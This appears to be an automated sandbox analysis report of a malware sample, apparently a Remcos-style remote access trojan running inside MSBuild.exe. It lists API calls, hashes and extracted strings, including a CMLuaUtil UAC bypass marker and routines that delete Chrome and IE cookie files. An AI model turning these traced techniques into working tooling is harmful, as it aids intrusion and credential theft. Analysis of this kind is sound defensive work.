                                                                                                                                                                                    • Opcode ID: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                                                                                                                                                                                    • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                    • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                    • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                    • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                                                                                    • __fassign.LIBCMT ref: 0044A180
                                                                                                                                                                                    • __fassign.LIBCMT ref: 0044A19B
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                    • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                      • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                      • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                    • String ID: TUFTUF$>G$DG$DG
                                                                                                                                                                                    • API String ID: 3114080316-344394840
                                                                                                                                                                                    • Opcode ID: 5ada2776117986fdda91317c1ef980534e519c22f238f3628a5ce40721f5b323
                                                                                                                                                                                    • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ada2776117986fdda91317c1ef980534e519c22f238f3628a5ce40721f5b323
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                    • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                    • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                    • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                    • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                                                                    • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                      • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                      • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                                                                                                    • Opcode ID: 4d1fcd799b7e02ba9e1f833a41a95cea5597047a047ce84bb64cdb84cd8b1b0e
                                                                                                                                                                                    • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d1fcd799b7e02ba9e1f833a41a95cea5597047a047ce84bb64cdb84cd8b1b0e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 79b2a3fe438b863c194c0b5e8c45943ee54d112ae3f9121af085072b05ced17c
                                                                                                                                                                                    • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79b2a3fe438b863c194c0b5e8c45943ee54d112ae3f9121af085072b05ced17c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                    • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                    • String ID: P[G
                                                                                                                                                                                    • API String ID: 2536120697-571123470
                                                                                                                                                                                    • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                                                                                    • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                    • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                    • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                    • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                    • _free.LIBCMT ref: 10009315
                                                                                                                                                                                    • _free.LIBCMT ref: 10009320
                                                                                                                                                                                    • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                    • _free.LIBCMT ref: 10009336
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                    • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FD29
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FD34
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FD3F
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FD93
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FD9E
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FDA9
                                                                                                                                                                                    • _free.LIBCMT ref: 0044FDB4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                    • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                                                                                                                                                      • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                      • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                    • API String ID: 3851391207-1840432179
                                                                                                                                                                                    • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                    • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                    • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                    • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                    • String ID: H]G
                                                                                                                                                                                    • API String ID: 2536120697-1717957184
                                                                                                                                                                                    • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                                                                    • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                    • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                    • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                                                                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                    • API String ID: 2018770650-304995407
                                                                                                                                                                                    • Opcode ID: dfe89a798b749c9bba519fdb19838f0c49607846c9f20ba5960bfc3478b55717
                                                                                                                                                                                    • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: dfe89a798b749c9bba519fdb19838f0c49607846c9f20ba5960bfc3478b55717
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • BG, xrefs: 00406909
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00406927
                                                                                                                                                                                    • Rmc-L31JDJ, xrefs: 0040693F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Rmc-L31JDJ$BG
                                                                                                                                                                                    • API String ID: 0-659453181
                                                                                                                                                                                    • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                                                                    • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __allrem.LIBCMT ref: 00439789
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                                                                    • __allrem.LIBCMT ref: 004397BC
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                                                                    • __allrem.LIBCMT ref: 004397F1
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
